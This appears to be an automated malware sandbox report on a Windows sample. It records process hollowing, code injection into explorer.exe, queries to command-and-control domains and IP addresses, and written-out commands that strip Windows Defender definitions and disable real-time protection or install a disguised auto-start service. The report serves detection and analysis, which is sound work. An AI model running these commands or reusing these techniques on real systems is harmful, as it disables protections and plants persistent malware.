Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15A185 mov eax, dword ptr fs:[00000030h] 1_2_6E15A185
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14C182 mov eax, dword ptr fs:[00000030h] 1_2_6E14C182
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1EA189 mov eax, dword ptr fs:[00000030h] 1_2_6E1EA189
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1EA189 mov ecx, dword ptr fs:[00000030h] 1_2_6E1EA189
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A51BE mov eax, dword ptr fs:[00000030h] 1_2_6E1A51BE
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A51BE mov eax, dword ptr fs:[00000030h] 1_2_6E1A51BE
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A51BE mov eax, dword ptr fs:[00000030h] 1_2_6E1A51BE
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A51BE mov eax, dword ptr fs:[00000030h] 1_2_6E1A51BE
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1499BF mov ecx, dword ptr fs:[00000030h] 1_2_6E1499BF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1499BF mov ecx, dword ptr fs:[00000030h] 1_2_6E1499BF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1499BF mov eax, dword ptr fs:[00000030h] 1_2_6E1499BF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1499BF mov ecx, dword ptr fs:[00000030h] 1_2_6E1499BF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1499BF mov ecx, dword ptr fs:[00000030h] 1_2_6E1499BF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1499BF mov eax, dword ptr fs:[00000030h] 1_2_6E1499BF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1499BF mov ecx, dword ptr fs:[00000030h] 1_2_6E1499BF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1499BF mov ecx, dword ptr fs:[00000030h] 1_2_6E1499BF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1499BF mov eax, dword ptr fs:[00000030h] 1_2_6E1499BF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1499BF mov ecx, dword ptr fs:[00000030h] 1_2_6E1499BF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1499BF mov ecx, dword ptr fs:[00000030h] 1_2_6E1499BF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1499BF mov eax, dword ptr fs:[00000030h] 1_2_6E1499BF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1561A0 mov eax, dword ptr fs:[00000030h] 1_2_6E1561A0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1561A0 mov eax, dword ptr fs:[00000030h] 1_2_6E1561A0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E49A4 mov eax, dword ptr fs:[00000030h] 1_2_6E1E49A4
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E49A4 mov eax, dword ptr fs:[00000030h] 1_2_6E1E49A4
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E49A4 mov eax, dword ptr fs:[00000030h] 1_2_6E1E49A4
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E49A4 mov eax, dword ptr fs:[00000030h] 1_2_6E1E49A4
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1231E0 mov eax, dword ptr fs:[00000030h] 1_2_6E1231E0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B41E8 mov eax, dword ptr fs:[00000030h] 1_2_6E1B41E8
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12B1E1 mov eax, dword ptr fs:[00000030h] 1_2_6E12B1E1
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12B1E1 mov eax, dword ptr fs:[00000030h] 1_2_6E12B1E1
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12B1E1 mov eax, dword ptr fs:[00000030h] 1_2_6E12B1E1
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F89E7 mov eax, dword ptr fs:[00000030h] 1_2_6E1F89E7
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 16_2_03320042 push dword ptr fs:[00000030h] 16_2_03320042
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC75AC0 mov eax, dword ptr fs:[00000030h] 24_2_6AC75AC0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC75AC0 mov eax, dword ptr fs:[00000030h] 24_2_6AC75AC0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC75AC0 mov eax, dword ptr fs:[00000030h] 24_2_6AC75AC0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD48ADD mov eax, dword ptr fs:[00000030h] 24_2_6AD48ADD
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC73ACA mov eax, dword ptr fs:[00000030h] 24_2_6AC73ACA
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34AEF mov eax, dword ptr fs:[00000030h] 24_2_6AD34AEF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34AEF mov eax, dword ptr fs:[00000030h] 24_2_6AD34AEF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34AEF mov eax, dword ptr fs:[00000030h] 24_2_6AD34AEF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34AEF mov eax, dword ptr fs:[00000030h] 24_2_6AD34AEF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34AEF mov eax, dword ptr fs:[00000030h] 24_2_6AD34AEF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34AEF mov eax, dword ptr fs:[00000030h] 24_2_6AD34AEF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34AEF mov eax, dword ptr fs:[00000030h] 24_2_6AD34AEF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34AEF mov eax, dword ptr fs:[00000030h] 24_2_6AD34AEF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34AEF mov eax, dword ptr fs:[00000030h] 24_2_6AD34AEF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34AEF mov eax, dword ptr fs:[00000030h] 24_2_6AD34AEF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34AEF mov eax, dword ptr fs:[00000030h] 24_2_6AD34AEF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34AEF mov eax, dword ptr fs:[00000030h] 24_2_6AD34AEF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34AEF mov eax, dword ptr fs:[00000030h] 24_2_6AD34AEF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34AEF mov eax, dword ptr fs:[00000030h] 24_2_6AD34AEF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACAD294 mov eax, dword ptr fs:[00000030h] 24_2_6ACAD294
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACAD294 mov eax, dword ptr fs:[00000030h] 24_2_6ACAD294
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC752A5 mov eax, dword ptr fs:[00000030h] 24_2_6AC752A5
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC752A5 mov eax, dword ptr fs:[00000030h] 24_2_6AC752A5
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC752A5 mov eax, dword ptr fs:[00000030h] 24_2_6AC752A5
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC752A5 mov eax, dword ptr fs:[00000030h] 24_2_6AC752A5
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC752A5 mov eax, dword ptr fs:[00000030h] 24_2_6AC752A5
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC71AA0 mov eax, dword ptr fs:[00000030h] 24_2_6AC71AA0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA5AA0 mov eax, dword ptr fs:[00000030h] 24_2_6ACA5AA0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA5AA0 mov eax, dword ptr fs:[00000030h] 24_2_6ACA5AA0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA12BD mov esi, dword ptr fs:[00000030h] 24_2_6ACA12BD
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA12BD mov eax, dword ptr fs:[00000030h] 24_2_6ACA12BD
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA12BD mov eax, dword ptr fs:[00000030h] 24_2_6ACA12BD
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC72240 mov ecx, dword ptr fs:[00000030h] 24_2_6AC72240
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC72240 mov eax, dword ptr fs:[00000030h] 24_2_6AC72240
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC79240 mov eax, dword ptr fs:[00000030h] 24_2_6AC79240
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC79240 mov eax, dword ptr fs:[00000030h] 24_2_6AC79240
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC79240 mov eax, dword ptr fs:[00000030h] 24_2_6AC79240
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC79240 mov eax, dword ptr fs:[00000030h] 24_2_6AC79240
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD04257 mov eax, dword ptr fs:[00000030h] 24_2_6AD04257
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD04248 mov eax, dword ptr fs:[00000030h] 24_2_6AD04248
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB927A mov eax, dword ptr fs:[00000030h] 24_2_6ACB927A
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD2B260 mov eax, dword ptr fs:[00000030h] 24_2_6AD2B260
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD2B260 mov eax, dword ptr fs:[00000030h] 24_2_6AD2B260
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD48A62 mov eax, dword ptr fs:[00000030h] 24_2_6AD48A62
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC88A0A mov eax, dword ptr fs:[00000030h] 24_2_6AC88A0A
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC93A1C mov eax, dword ptr fs:[00000030h] 24_2_6AC93A1C
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC75210 mov eax, dword ptr fs:[00000030h] 24_2_6AC75210
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC75210 mov ecx, dword ptr fs:[00000030h] 24_2_6AC75210
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC75210 mov eax, dword ptr fs:[00000030h] 24_2_6AC75210
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC75210 mov eax, dword ptr fs:[00000030h] 24_2_6AC75210
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9A229 mov eax, dword ptr fs:[00000030h] 24_2_6AC9A229
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9A229 mov eax, dword ptr fs:[00000030h] 24_2_6AC9A229
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9A229 mov eax, dword ptr fs:[00000030h] 24_2_6AC9A229
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9A229 mov eax, dword ptr fs:[00000030h] 24_2_6AC9A229
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9A229 mov eax, dword ptr fs:[00000030h] 24_2_6AC9A229
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9A229 mov eax, dword ptr fs:[00000030h] 24_2_6AC9A229
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9A229 mov eax, dword ptr fs:[00000030h] 24_2_6AC9A229
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9A229 mov eax, dword ptr fs:[00000030h] 24_2_6AC9A229
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9A229 mov eax, dword ptr fs:[00000030h] 24_2_6AC9A229
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC74A20 mov eax, dword ptr fs:[00000030h] 24_2_6AC74A20
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC74A20 mov eax, dword ptr fs:[00000030h] 24_2_6AC74A20
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACFEA20 mov eax, dword ptr fs:[00000030h] 24_2_6ACFEA20
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC78239 mov eax, dword ptr fs:[00000030h] 24_2_6AC78239
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC78239 mov eax, dword ptr fs:[00000030h] 24_2_6AC78239
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC78239 mov eax, dword ptr fs:[00000030h] 24_2_6AC78239
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC71BE9 mov eax, dword ptr fs:[00000030h] 24_2_6AC71BE9
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC723F6 mov eax, dword ptr fs:[00000030h] 24_2_6AC723F6
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD223E3 mov ecx, dword ptr fs:[00000030h] 24_2_6AD223E3
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD223E3 mov ecx, dword ptr fs:[00000030h] 24_2_6AD223E3
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD223E3 mov eax, dword ptr fs:[00000030h] 24_2_6AD223E3
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC74B94 mov edi, dword ptr fs:[00000030h] 24_2_6AC74B94
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD3138A mov eax, dword ptr fs:[00000030h] 24_2_6AD3138A
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD1EB8A mov ecx, dword ptr fs:[00000030h] 24_2_6AD1EB8A
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD1EB8A mov eax, dword ptr fs:[00000030h] 24_2_6AD1EB8A
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD1EB8A mov eax, dword ptr fs:[00000030h] 24_2_6AD1EB8A
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD1EB8A mov eax, dword ptr fs:[00000030h] 24_2_6AD1EB8A
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD48BB6 mov eax, dword ptr fs:[00000030h] 24_2_6AD48BB6
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA4BAD mov eax, dword ptr fs:[00000030h] 24_2_6ACA4BAD
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA4BAD mov eax, dword ptr fs:[00000030h] 24_2_6ACA4BAD
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA4BAD mov eax, dword ptr fs:[00000030h] 24_2_6ACA4BAD
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD49BBE mov eax, dword ptr fs:[00000030h] 24_2_6AD49BBE
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD31BA8 mov eax, dword ptr fs:[00000030h] 24_2_6AD31BA8
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC7F340 mov eax, dword ptr fs:[00000030h] 24_2_6AC7F340
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC7DB40 mov eax, dword ptr fs:[00000030h] 24_2_6AC7DB40
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD48B58 mov eax, dword ptr fs:[00000030h] 24_2_6AD48B58
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA3B5A mov eax, dword ptr fs:[00000030h] 24_2_6ACA3B5A
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Process token adjusted: Debug
Source: C:\Windows\System\svchost.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 0_2_004093F0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004093F0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 0_2_00402320 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00402320
Source: C:\Users\user\AppData\Local\Temp\2531.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: webgfvd.4.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: 999080321uest71-service100201dom25999080321.ru
Source: C:\Windows\explorer.exe Domain query: 999080321test13461-service10020125999080321.net
Source: C:\Windows\explorer.exe Domain query: 999080321yes1t3481-service10020125999080321.ru
Source: C:\Windows\explorer.exe Domain query: 999080321test12671-service10020125999080321.online
Source: C:\Windows\explorer.exe Domain query: 999080321est213531-service1002012425999080321.ru
Source: C:\Windows\explorer.exe Domain query: 999080321newfolder1002002131-service1002.space
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 185.156.177.26 80
Source: C:\Windows\explorer.exe Network Connect: 91.212.150.205 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: 999080321test13561-service10020125999080321.su
Source: C:\Windows\explorer.exe Domain query: 999080321utest1341-service10020125999080321.ru
Source: C:\Windows\explorer.exe Domain query: 999080321newfolder1002002231-service1002.space
Source: C:\Windows\explorer.exe Domain query: 999080321test14781-service10020125999080321.info
Source: C:\Windows\explorer.exe Domain query: 999080321newfolder1002002431-service1002.space
Source: C:\Windows\explorer.exe Domain query: 999080321test146831-service10020125999080321.space
Source: C:\Windows\explorer.exe Domain query: 999080321test61-service10020125999080321.website
Source: C:\Windows\explorer.exe Domain query: 999080321test125831-service10020125999080321.space
Source: C:\Windows\explorer.exe Domain query: 999080321test15671-service10020125999080321.tech
Source: C:\Windows\explorer.exe Domain query: 999080321newfolder1002002531-service1002.space
Source: C:\Windows\SysWOW64\explorer.exe Domain query: 999080321test51-service10020125999080321.xyz
Source: C:\Windows\explorer.exe Domain query: 999080321newfolder3100231-service1002.space
Source: C:\Windows\explorer.exe Domain query: 999080321test134831-service10020125999080321.space
Source: C:\Windows\explorer.exe Domain query: 999080321test147831-service10020125999080321.space
Source: C:\Windows\explorer.exe Network Connect: 95.213.144.186 144 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 176.111.174.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: 999080321newfolder33417-012425999080321.space
Source: C:\Windows\explorer.exe Domain query: 999080321test136831-service10020125999080321.space
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 0_2_03290110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 0_2_03290110
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Thread created: C:\Windows\explorer.exe EIP: 30D3364 Jump to behavior
Source: C:\Users\user\AppData\Roaming\webgfvd Thread created: unknown EIP: 6D23364 Jump to behavior
DLL side loading technique detected
Source: C:\Windows\System32\SgrmBroker.exe Section loaded: C:\Windows\System32\ucrtbase.dll Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Memory written: C:\Users\user\Desktop\bNdOhKPy0F.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\webgfvd Memory written: C:\Users\user\AppData\Roaming\webgfvd base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Memory written: C:\Users\user\AppData\Local\Temp\2531.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\webgfvd Memory written: unknown base: 400000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\explorer.exe Memory written: PID: 5756 base: F5F380 value: 90 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\webgfvd Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\webgfvd Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Removes signatures from Windows Defender
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\MpCmdRun.exe' -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
Source: C:\Windows\System\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\MpCmdRun.exe' -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\MpCmdRun.exe' -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
Source: C:\Windows\System\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\MpCmdRun.exe' -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\webgfvd Section unmapped: unknown base address: 400000
Writes to foreign memory regions
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: F5F380 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Process created: C:\Users\user\Desktop\bNdOhKPy0F.exe 'C:\Users\user\Desktop\bNdOhKPy0F.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\webgfvd Process created: C:\Users\user\AppData\Roaming\webgfvd C:\Users\user\AppData\Roaming\webgfvd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process created: C:\Users\user\AppData\Local\Temp\2531.exe C:\Users\user\AppData\Local\Temp\2531.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process created: C:\Users\user\AppData\Local\Temp\2531.exe C:\Users\user\AppData\Local\Temp\2531.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\MpCmdRun.exe' -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Process created: C:\Windows\System\svchost.exe 'C:\Windows\System\svchost.exe' formal
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\hqoawywe\
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\bquyobss.exe' C:\Windows\SysWOW64\hqoawywe\
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process created: C:\Windows\SysWOW64\sc.exe 'C:\Windows\System32\sc.exe' create hqoawywe binPath= 'C:\Windows\SysWOW64\hqoawywe\bquyobss.exe /d\'C:\Users\user\AppData\Local\Temp\5CDE.exe\'' type= own start= auto DisplayName= 'wifi support'
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process created: unknown unknown
Source: C:\Windows\System\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\MpCmdRun.exe' -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
Source: C:\Users\user\AppData\Roaming\webgfvd Process created: unknown unknown
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 1_2_6E15E730
Source: explorer.exe, 00000004.00000000.283992059.0000000001640000.00000002.00000001.sdmp, 2531.exe, 00000019.00000002.500420372.0000000001A90000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.283992059.0000000001640000.00000002.00000001.sdmp, 2531.exe, 00000019.00000002.500420372.0000000001A90000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.283992059.0000000001640000.00000002.00000001.sdmp, 2531.exe, 00000019.00000002.500420372.0000000001A90000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000004.00000000.283662883.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000004.00000000.283992059.0000000001640000.00000002.00000001.sdmp, 2531.exe, 00000019.00000002.500420372.0000000001A90000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000004.00000000.283992059.0000000001640000.00000002.00000001.sdmp, 2531.exe, 00000019.00000002.500420372.0000000001A90000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
